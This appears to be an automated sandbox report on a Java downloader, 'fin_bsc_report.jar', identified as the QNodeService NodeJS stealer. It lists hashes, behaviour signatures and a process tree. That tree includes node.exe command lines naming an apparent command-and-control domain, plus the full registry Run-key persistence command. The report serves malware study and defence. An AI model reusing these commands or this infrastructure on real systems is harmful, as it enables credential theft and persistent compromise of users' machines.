Analysis
-
max time kernel
145s -
max time network
125s -
platform
windows10_x64 -
resource
win10 -
submitted
19-10-2020 10:55
Static task
static1
Behavioral task
behavioral1
Sample
fin_bsc_report.jar
Resource
win7
Behavioral task
behavioral2
Sample
fin_bsc_report.jar
Resource
win10
General
-
Target
fin_bsc_report.jar
-
Size
73KB
-
MD5
7447f61327acef94cbdaaaacdc5f7f2d
-
SHA1
d831ded9fc308cc53be80d819d33128392fcf962
-
SHA256
47f862b9d75a9190696a0620efddfe7e43b16b79c0b0f009a55ed5360f35b312
-
SHA512
0f4264a0335589b23e1c1a65f6bcbec24d5c4266e5d5d851fa2ad6990300618c7fa4e44ec957e095a9629c6d95175883636d7e7188297387ca21c25372cf8146
Malware Config
Signatures
-
QNodeService
Trojan/stealer written in NodeJS and spread via Java downloader.
-
Executes dropped EXE 3 IoCs
pid Process 1076 node.exe 900 node.exe 1160 node.exe -
Loads dropped DLL 6 IoCs
pid Process 1160 node.exe 1160 node.exe 1160 node.exe 1160 node.exe 1160 node.exe 1160 node.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Windows\CurrentVersion\Run\29732ecc-c047-476e-ad5b-b0041e294f96 = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\"" reg.exe -
JavaScript code in executable 3 IoCs
resource yara_rule behavioral2/files/0x000100000001ad87-171.dat js behavioral2/files/0x000100000001ad87-175.dat js behavioral2/files/0x000100000001ad87-179.dat js -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 17 wtfismyip.com 18 wtfismyip.com -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString node.exe -
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid Process 1076 node.exe 1076 node.exe 1076 node.exe 1076 node.exe 900 node.exe 900 node.exe 900 node.exe 900 node.exe 1160 node.exe 1160 node.exe 1160 node.exe 1160 node.exe 1160 node.exe 1160 node.exe 1160 node.exe 1160 node.exe 1160 node.exe 1160 node.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 2928 wrote to memory of 2184 2928 java.exe 76 PID 2928 wrote to memory of 2184 2928 java.exe 76 PID 2184 wrote to memory of 1076 2184 javaw.exe 78 PID 2184 wrote to memory of 1076 2184 javaw.exe 78 PID 1076 wrote to memory of 900 1076 node.exe 80 PID 1076 wrote to memory of 900 1076 node.exe 80 PID 900 wrote to memory of 1160 900 node.exe 81 PID 900 wrote to memory of 1160 900 node.exe 81 PID 1160 wrote to memory of 1748 1160 node.exe 83 PID 1160 wrote to memory of 1748 1160 node.exe 83 PID 1748 wrote to memory of 3708 1748 cmd.exe 84 PID 1748 wrote to memory of 3708 1748 cmd.exe 84
Processes
-
C:\ProgramData\Oracle\Java\javapath\java.exejava -jar C:\Users\Admin\AppData\Local\Temp\fin_bsc_report.jar1⤵
- Suspicious use of WriteProcessMemory
PID:2928 -
C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\cea6dfb4.tmp2⤵
- Suspicious use of WriteProcessMemory
PID:2184 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain chinpao.hopto.org --hub-domain localhost3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1076 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_Ilvx95\boot.js --hub-domain chinpao.hopto.org --hub-domain localhost4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:900 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_Ilvx95\boot.js --hub-domain chinpao.hopto.org --hub-domain localhost5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1160 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "29732ecc-c047-476e-ad5b-b0041e294f96" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""6⤵
- Suspicious use of WriteProcessMemory
PID:1748 -
C:\Windows\system32\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "29732ecc-c047-476e-ad5b-b0041e294f96" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""7⤵
- Adds Run key to start application
PID:3708
-
-
-
-
-
-